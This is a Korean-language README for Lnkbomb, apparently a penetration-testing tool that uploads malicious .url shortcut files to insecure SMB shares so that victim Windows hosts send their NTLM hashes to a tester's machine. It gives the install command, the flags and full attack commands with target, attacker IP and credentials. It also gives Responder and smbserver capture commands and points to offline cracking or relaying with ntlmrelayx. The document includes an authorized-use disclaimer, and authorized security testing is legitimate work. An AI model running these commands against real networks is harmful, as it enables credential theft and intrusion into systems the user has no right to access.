
보안 취약한 파일 공유에서 NTLM 해시를 수집하기 위한 악성 바로가기 생성기.
Lnkbomb는 보안이 취약한 파일 공유에 악성 바로 가기 파일을 업로드하는 데 사용됩니다. 이 취약점은 Windows가 바로 가기 파일과 연결할 아이콘 파일을 찾기 때문에 발생합니다. 이 아이콘 파일을 침투 테스터의 Responder 또는 smbserver가 실행 중인 시스템으로 연결하면, 피해 호스트 머신의 구성에 따라 NTLMv1 또는 NTLMv2 해시를 수집할 수 있습니다. 테스터는 수집된 해시를 Hashcat과 같은 도구로 오프라인에서 크래킹하거나, ntlmrelayx와 같은 도구로 릴레이하여 추가 공격을 수행할 수 있습니다.
페이로드 파일은 테스터가 명령줄에서 지정한 안전하지 않은 파일 공유에 직접 업로드됩니다. 테스터는 자신의 IP 주소도 포함하며, 이는 페이로드에 기록됩니다.
버전 2.0은 도구를 완전히 재구축한 것으로, pysmb 라이브러리를 사용하여 인증되지 않은 상태와 인증된 상태 모두에서 페이로드를 드롭할 수 있습니다.
Lnkbomb 설치하기
이 프로젝트는 Windows에서 안정적으로 작동합니다. Linux에서는 문제가 발생할 수 있습니다.
git clone https://github.com/dievus/lnkbomb.git
lnkbomb 디렉토리로 이동하여 실행합니다:
python3 lnkbomb.py -h
그러면 도움말 메뉴가 출력되며, 다음 플래그가 포함됩니다:
-h, --help - 도움말 옵션을 나열합니다
-t, --target - 대상 IP 주소를 지정합니다
-a, --attacker - 테스터의 공격 머신 IP 주소를 지정합니다
-r, --recover - 테스트 완료 후 페이로드를 제거하는 데 사용됩니다 (예: -r payloadname.url)
-w, --windows - 새 명령 - Windows 공유에 적절한 포트를 설정하는 데 필요합니다
-l, --linux - 새 명령 - Linux 공유에 적절한 포트를 설정하는 데 필요합니다
-n, --netbios - 새 명령 - 대상 Windows 머신의 NetBIOS 이름을 포함해야 합니다
전체 명령어 예시:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
Responder 또는 smbserver와 같은 도구를 사용하여 NTLM 해시를 캡처해야 합니다.
responder -I eth0 -dwFP -v
또는
smbserver.py . . -smb2support
이 도구는 윤리적 해킹 및 침투 테스트 목적으로만 사용하도록 설계되었습니다. 현재 테스트할 권한이 없는 대상을 테스트하는 행위를 용납하지 않습니다.
이 도구는 대상의 패치 및 버전 상태에 따라 작동하지 않을 수도 있습니다. 사용자 경험은 다를 수 있습니다.
확장자가 .lnk가 아닌 .url 바로 가기인 점을 알고 있습니다. 의도적으로 그렇게 한 것입니다.